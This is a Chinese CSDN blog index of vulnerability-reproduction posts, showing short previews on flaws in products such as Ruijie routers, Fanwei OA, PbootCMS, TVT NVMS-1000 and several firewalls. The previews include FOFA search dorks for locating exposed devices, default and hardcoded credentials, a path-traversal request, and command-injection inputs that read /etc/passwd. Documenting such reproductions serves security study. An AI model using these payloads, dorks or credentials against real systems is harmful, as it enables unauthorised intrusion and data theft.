![](https://img-blog.csdnimg.cn/20201014180756928.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
漏洞复现
孤桜懶契
这个作者很懒,什么都没留下…
展开
-
PbootCMS search SQL注入漏洞
搜索框页面为✅ Payload为https://gylq.gitee.io/time/原创 2022-07-13 15:49:39 · 4687 阅读 · 1 评论 -
泛微 E-cology V9 信息泄露漏洞
泛微OA E-Cology信息泄露 API接口漏洞只针对e-cology v9.0版本才有用,JS文件中有一个API接口原创 2022-06-18 21:19:34 · 4921 阅读 · 6 评论 -
中科网威 下一代防火墙控制系统 账号密码泄露漏洞
漏洞描述i ⭐中科网威 下一代防火墙控制系统 存在账号密码泄露漏洞,攻击者通过前端获取密码的Md5后解密可获取完整密码登陆后台漏洞影响s ✅中科网威 下一代防火墙控制系统空间测绘d ⭕FOFA:body="Get_Verify_Info(hex_md5(user_string)."漏洞复现访问后登录页面如下✅ F12查看前端发现 admin的md5加密密码var persons = [{"name":"admin","password":"64ef657e3414cd原创 2022-04-27 10:03:29 · 1531 阅读 · 1 评论 -
帆软报表 2012 信息泄露漏洞导致RCE
漏洞描述i ⭐帆软报表 2012 存在信息泄露漏洞,通过访问特定的Url获取部分敏感信息漏洞影响s ✅帆软报表 2012空间测绘d ⭕FOFA:body="down.download?FM_SYS_ID"漏洞复现访问ip日志EXPhttp://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false✅ 数据库信息泄露http://xxx.xxx原创 2022-04-25 22:20:30 · 5178 阅读 · 0 评论 -
JD-FreeFuck 京东薅羊毛控制面板 后台命令执行漏洞
漏洞描述i ⭐JD-FreeFuck 存在后台命令执行漏洞,由于传参执行命令时没有对内容过滤,导致可以执行任意命令,控制服务器 项目地址: https://github.com/meselson/JD-FreeFuck漏洞影响s ✅JD-FreeFuck空间测绘d ⭕FOFA:title="京东薅羊毛控制面板"漏洞复现访问后登录页面如下✅ 默认账号useradmin/supermanitoPOST /runCmd HTTP/1.1cmd=bash+jd.sh+%3原创 2022-04-22 22:46:52 · 2378 阅读 · 0 评论 -
TVT数码科技 NVMS-1000 路径遍历漏洞(CVE-2019-20085)
漏洞描述i ⭐TVT数码科技 TVT NVMS-1000是中国TVT数码科技公司的一套网络监控视频管理系统。 TVT数码科技 TVT NVMS-1000中存在路径遍历漏洞。远程攻击者可通过发送包含/../的特制URL请求利用该漏洞查看系统上的任意文件漏洞影响s ✅TVT NVMS-1000空间测绘d ⭕FOFA:app="TVT-NVMS-1000"漏洞复现访问首页✅ expGET /../../../../../../../../../../../../window原创 2022-04-19 22:36:23 · 1039 阅读 · 1 评论 -
蓝海卓越计费管理系统 debug.php 远程命令执行漏洞
漏洞描述i ⭐蓝海卓越计费管理系统 debug.php 存在命令调试页面,导致攻击者可以远程命令执行漏洞影响s ✅蓝海卓越计费管理系统空间测绘d ⭕Hunter:web.title="蓝海卓越计费管理系统"漏洞复现✅访问首页✅执行Payload命令,访问路径/debug.php$ ifconfigeth0 Link encap:Ethernet HWaddr 00:21:9B:FB:30:27inet addr:192.168.0.1 Bcast:192.168.原创 2022-04-18 13:18:00 · 2821 阅读 · 1 评论 -
锐捷 NBR路由器 远程命令执行漏洞(CNVD-2021-09650)
漏洞描述i ⭐锐捷NBR路由器 EWEB网管系统部分接口存在命令注入,导致远程命令执行获取权限漏洞影响s ✅锐捷NBR路由器 EWEB网管系统空间测绘d ⭕FOFA:title="锐捷网络-EWEB网管系统"⭕FOFA:icon_hash="-692947551"漏洞复现✅访问首页✅执行Payload命令POST /guest_auth/guestIsUp.phpmac=1&ip=127.0.0.1|cat /etc/passwd > test.tx原创 2022-04-14 21:46:03 · 10712 阅读 · 1 评论 -
锐捷 Smartweb管理系统 密码信息泄露漏洞
漏洞描述i ⭐锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞,攻击者可从漏洞获取到管理员账号密码,从而以管理员权限登录。漏洞影响s ✅锐捷网络股份有限公司 无线smartweb管理系统空间测绘d ⭕FOFA:title="无线smartWeb--登录页面"漏洞复现✅访问首页,存在账号guest/guest登陆而且响应中包含了 admin密码的base64加密,直接全局搜索admin可以看到访问未授权路径/web/xml/webuser-auth.原创 2022-04-10 15:10:50 · 1917 阅读 · 0 评论 -
锐捷 云课堂主机 pool 目录遍历漏洞
漏洞描述i ⭐锐捷云课堂主机存在目录遍历漏洞,通过访问get请求/pool/,即可读取目录.导致敏感信息泄露.漏洞影响s ✅锐捷云课堂空间测绘d ⭕FOFA:title="Ruijie" && "云课堂主机"漏洞复现✅访问 http://1.1.1.1/pool目录遍历Directory Listing For /Filename Size Last Modified Packages.gz 490.8 kb Fri, 26 May 2017 00:原创 2022-04-09 08:32:15 · 2906 阅读 · 0 评论 -
佑友防火墙 后台命令执行漏洞
漏洞描述i ⭐佑友防火墙 后台维护工具存在命令执行,由于没有过滤危险字符,导致可以执行任意命令漏洞影响s ✅佑友防火墙空间测绘d ⭕FOFA:title="佑友防火墙"漏洞复现登陆页面✅默认账号密码为 admin/hicomadmin127.0.0.1|whoami127.0.0.1|cat /etc/passwdroot:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2原创 2022-04-07 12:30:21 · 1798 阅读 · 0 评论 -
宏电 H8922 Telnet后门漏洞(CVE-2021-28149)
漏洞描述i ⭐宏电 H8922 Telnet存在硬编码的账号密码 且默认开放 5188端口连接,可以以Root身份获取权限漏洞影响s ✅宏电 H8922空间测绘d ⭕ZoomEy:app:"Hongdian H8922 Industrial Router"漏洞复现搜索✅ Telnet连接目标5188端口,账号密码为 root/superzxmn...原创 2022-04-06 17:24:52 · 1454 阅读 · 0 评论 -
Kyan 网络监控设备 hosts 账号密码泄露漏洞
漏洞描述Kyan 网络监控设备 存在账号密码泄露漏洞,攻击者通过漏洞可以获得账号密码和后台权限漏洞影响s ✅Kyan空间测绘d ⭕title="platform - Login"漏洞复现✅登陆页面如下漏洞urlhttp://127.0.0.1/hosts个人博客孤桜懶契:https://gylq.gitee.io/time...原创 2022-04-05 20:25:31 · 1037 阅读 · 0 评论 -
智慧校园管理系统 前台任意文件上传漏洞
漏洞描述智慧校园管理系统前台注册页面存在文件上传,由于没有对上传的文件进行审查导致可上传恶意文件控制服务器漏洞影响s ✅智慧校园管理系统空间测绘d ⭕body="DC_Login/QYSignUp"漏洞复现✅企业注册界面存在漏洞上传附件上传一个冰蝎马会有返回路径连接地址个人博客孤桜懶契:https://gylq.gitee.io/time...原创 2022-03-31 21:36:33 · 3445 阅读 · 0 评论 -
狮子鱼CMS image_upload.php 任意文件上传
漏洞描述网站系统为狮子鱼社区团购系统,网上用的也比较多,我fofa上搜了一下,大概有6-7千多。主要用户各种购物,本文主要介绍其中两个文件上传漏洞,漏洞复现以及漏洞工具分享。漏洞影响s ✅狮子鱼CMS空间测绘d ⭕FOFA:"/seller.php?s=/Public/login"漏洞复现POCPOST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1Host: ipContent-Type原创 2022-03-29 16:45:00 · 4414 阅读 · 0 评论 -
Nostromo 1.9.6 远程代码执行漏洞(CVE-2019-16278)
漏洞描述用于利用 Nostromo nhttpd 中函数 http_verify 中的目录遍历漏洞利用 CVE-2019-16278 (Nostromo 1.9.6),该漏洞通过精心设计的 HTTP 请求导致未经身份验证的 RCE。仅将 Web 服务器的主机和端口作为必需参数。漏洞影响s ✅Nostromo 1.9.6空间测绘d ⭕hunter:web.similar_id="4fe4d6adce727c111450c2be583537b6"&&header.server==原创 2022-03-28 16:37:38 · 1175 阅读 · 0 评论 -
TerraMaster TOS createRaid 远程命令执行(CVE-2022-24990)
漏洞描述TerraMaster TOS mobile.class.php文件的createRaid办法存在远程命令执行破绽 ,攻击者配合 CVE-2022-24990破绽能够获取效劳器权限漏洞影响TerraMaster TOS < 4.2.31空间测绘d ⭕FOFA:“TOS Loading” && country=“CN”漏洞复现首页访问信息泄露写入phpinfo脚本地址https://github.com/lishang520/CVE原创 2022-03-27 21:53:30 · 1567 阅读 · 1 评论 -
Apache APISIX Dashboard 任意命令执行批量编写工具
Apache APISIX Dashboard远程命令执行漏洞(CVE-2021-45232)漏洞描述Apache APISIX 是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIX。该漏洞的存在是由于 Manager API 中的错误。Manager API 在 gin 框架的基础上引入了 droplet 框架,所有的 API原创 2022-01-16 20:56:55 · 2410 阅读 · 0 评论 -
Apache APISIX Dashboard 任意命令执行CVE-2021-45232
Apache APISIX Dashboard远程命令执行漏洞(CVE-2021-45232)漏洞描述Apache APISIX 是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIX。该漏洞的存在是由于 Manager API 中的错误。Manager API 在 gin 框架的基础上引入了 droplet 框架,所有的 API原创 2022-01-07 15:43:58 · 2440 阅读 · 0 评论